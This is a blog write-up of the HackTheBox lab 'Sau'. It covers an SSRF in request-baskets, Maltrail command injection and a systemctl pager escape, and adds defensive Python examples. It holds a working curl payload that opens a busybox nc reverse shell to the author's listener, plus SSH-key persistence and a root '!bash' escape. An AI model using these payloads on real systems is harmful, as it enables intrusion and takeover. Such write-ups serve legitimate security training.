cwoellner.com ~ personal website & blog

Writeup of Sau From HackTheBox

Published on: Sunday, Jan 7, 2024

Getting a foothold and user flag

I start with an nmap scan of all TCP ports to discover open services:

>>> nmap -sS -Pn -p- -T5 -oN nmap.txt 10.129.163.130
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    filtered http
4095/tcp  filtered xtgui
7115/tcp  filtered unknown
8338/tcp  filtered unknown
14359/tcp filtered unknown
47306/tcp filtered unknown
49717/tcp filtered unknown
54433/tcp filtered unknown
55555/tcp open     unknown

Only 22 and 55555 are open. Port 80 shows up as filtered rather than closed, which points to a firewall rule dropping remote traffic to a web server that is running on the box. Port 55555 is open, so I try to reach it with my browser.

Landing Page

The application is request-baskets. It lets you create a “basket”, a URL that records every HTTP request sent to it and answers with a configurable response. The feature that matters here is found under the “Settings” button: a basket can be given a forward URL, and with proxy response enabled the service fetches that URL itself and relays the answer back to the caller. Since port 80 is filtered for remote IP addresses but the service runs on the box, I can point the forward URL at port 80 on localhost (127.0.0.1) and reach the hidden web server through the proxy. This is a server-side request forgery (CVE-2023-27163 in request-baskets up to 1.2.1).

Proxy Settings

When I open the basket URL in my browser, the firewall bypass works: the proxied response is a website running an application called “Maltrail”.

Firewall Bypass

Looking up the application, I find an unauthenticated RCE in Maltrail with a PoC available: the login handler interpolates the username parameter into a shell command string, so shell metacharacters in the username are executed by the server. I replace the payload of the PoC with various reverse shells from https://www.revshells.com/ and get it to work with “busybox nc -e”, pointing it at a listener on my machine (10.10.14.46, port 4242). The request is sent to the basket URL, which relays it to Maltrail's /login endpoint on localhost:

curl http://10.129.163.130:55555/ansg0gn/login  --data 'username=;`busybox nc 10.10.14.46 4242 -e /bin/bash`'

This gives me a shell as the user puma, and I can now read the user flag. Since the reverse shell is quite laggy, I create the “.ssh” directory in /home/puma and add my public ssh key to the authorized_keys file so that I can log in via ssh instead.
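The injection above works because the server builds a shell command string out of the username. The following Python example is added here for illustration; it is not Maltrail's code or the author's, and it uses echo as a stand-in for the real logging command. It shows the vulnerable pattern next to a hardened version that passes argv as a list, run against a constructed payload of the same shape as the one in the curl command (semicolon plus backticks, with a harmless echo in place of the reverse shell):

```python
import subprocess

# Constructed payload with the same shape as the one sent to the login form
# above; the injected command is a harmless echo instead of a reverse shell.
PAYLOAD = ";`echo INJECTED`"


def log_failed_login_vulnerable(username: str) -> str:
    """Illustrative vulnerable pattern (not Maltrail's code): the attacker-
    controlled username is interpolated into a command string that is handed
    to /bin/sh. Inside double quotes the shell still performs backtick command
    substitution, so `...` in the username is executed."""
    cmd = 'echo "Failed login for user %s"' % username
    return subprocess.check_output(cmd, shell=True, text=True)


def log_failed_login_hardened(username: str) -> str:
    """Same log message, but argv is passed as a list and no shell is
    involved: the username reaches echo as a single argument, so the
    semicolon and backticks are just bytes inside that argument."""
    return subprocess.check_output(
        ["echo", "Failed login for user %s" % username], text=True
    )


def was_injected(output: str) -> bool:
    """True when the marker appears with its backticks consumed, i.e. the
    substitution ran instead of being logged verbatim."""
    return "INJECTED" in output and "`" not in output


if __name__ == "__main__":
    print("vulnerable:", repr(log_failed_login_vulnerable(PAYLOAD)))
    print("hardened:  ", repr(log_failed_login_hardened(PAYLOAD)))
```

In the vulnerable function /bin/sh evaluates the backticks and the marker shows up in the output with the backticks gone; in the hardened function the username arrives as one argument and is logged verbatim. The same holds for the busybox nc payload: with no shell between the web handler and the logging program there is nothing to interpret the semicolon or the backticks.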

Root flag

After logging in via ssh, I run sudo -l.

>>> sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

I look up systemctl on GTFOBins and use method (c) of its sudo entry. systemctl status pipes its output through a pager (less) when stdout is a terminal, and because sudo runs systemctl as root, the pager runs as root too. I enter sudo /usr/bin/systemctl status trail.service and, once the journal output appears in the pager, I type !bash: the ! command in less hands the rest of the line to a shell. Two caveats: the pager is only started when the output does not fit on the screen, so shrink the terminal if the status output is short; and the trick relies on the pager allowing shell commands, which systemd before 247 did nothing to prevent (CVE-2023-26604; newer systemd starts less with LESSSECURE=1 when running under sudo).

Upon hitting enter, I receive a shell as root.
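A quick way to catch this class of sudo rule before someone else does: the Python script below (an added example, not part of the original writeup) parses sudo -l output and flags commands that would open a pager as root without --no-pager. The sample input is the sudo -l output from this box with two constructed extra rules appended, one already hardened and one for journalctl, to exercise both branches; the function and variable names are mine.

```python
import re
import shlex
from pathlib import PurePosixPath

# Sample input: the sudo -l output from this box, plus two constructed rules
# (a hardened systemctl rule and a journalctl rule) to exercise both branches.
SUDO_L_OUTPUT = """\
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
    (root) /usr/bin/systemctl --no-pager status trail.service
    (ALL) NOPASSWD: /usr/bin/journalctl -u trail.service
"""

# One sudoers rule as printed by sudo -l: "(runas) TAG: TAG: command, command".
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$"
)

# Programs that pipe through $PAGER (less) when stdout is a TTY. A set lists
# the verbs that page; None means every invocation pages.
PAGER_COMMANDS = {
    "systemctl": {"status", "cat", "list-units", "list-unit-files", "list-timers"},
    "journalctl": None,
}


def find_pager_escapes(sudo_l_output: str) -> list:
    """Return one finding per sudo rule whose command would drop the caller
    into a root-owned less, from which "!bash" gives a root shell."""
    findings = []
    for line in sudo_l_output.splitlines():
        match = RULE_RE.match(line)
        if not match:
            continue
        for command in re.split(r",\s*", match.group("cmd")):
            try:
                argv = shlex.split(command)
            except ValueError:  # unbalanced quotes in the rule, skip it
                continue
            if not argv:
                continue
            prog = PurePosixPath(argv[0]).name
            if prog not in PAGER_COMMANDS or "--no-pager" in argv[1:]:
                continue
            paging_verbs = PAGER_COMMANDS[prog]
            verb = next((a for a in argv[1:] if not a.startswith("-")), None)
            if paging_verbs is not None and verb not in paging_verbs:
                continue
            findings.append({
                "runas": match.group("runas").strip(),
                "command": command,
                # Suggested sudoers command: same argv with --no-pager inserted.
                "fix": " ".join([argv[0], "--no-pager", *argv[1:]]),
            })
    return findings


if __name__ == "__main__":
    for finding in find_pager_escapes(SUDO_L_OUTPUT):
        print(f"{finding['runas']}: {finding['command']}")
        print(f"    -> {finding['fix']}")
```

The suggested fix puts --no-pager into the sudoers command itself. Because sudo matches the full argument list, the user can neither drop the flag nor add anything else, and less is never started. On systemd 247 and later the pager is also started with LESSSECURE=1 under sudo, which disables the ! command in less, but the sudoers rule is the part the administrator controls directly.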